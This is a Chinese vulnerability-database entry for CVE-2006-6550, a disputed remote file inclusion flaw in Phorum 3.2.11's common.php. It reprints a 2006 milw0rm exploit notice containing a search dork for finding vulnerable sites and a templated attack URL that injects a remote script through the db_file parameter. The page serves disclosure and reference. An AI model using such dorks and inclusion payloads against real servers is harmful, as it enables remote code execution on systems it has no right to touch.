Phorum 'common.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111726 漏洞类型 未知
发布时间 2006-12-06 更新时间 2006-12-14
CVE编号 CVE-2006-6550 CNNVD-ID CNNVD-200612-316
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2894
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-316
|漏洞详情
**有争议**Phorum3.2.11及之前版本的common.php存在PHP远程文件包含漏洞。远程攻击者可以借助db_file参数中的URL,执行任意PHP代码。注:CVE对此漏洞有争议。因为db_file是在使用之前定义的。
|漏洞EXP
===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# milw0rm.com [2006-12-06]
|参考资料

来源:XF
名称:phorum-dbfile-file-include(30741)
链接:http://xforce.iss.net/xforce/xfdb/30741
来源:MILW0RM
名称:2894
链接:http://www.milw0rm.com/exploits/2894
来源:MILW0RM
名称:2894
链接:http://milw0rm.com/exploits/2894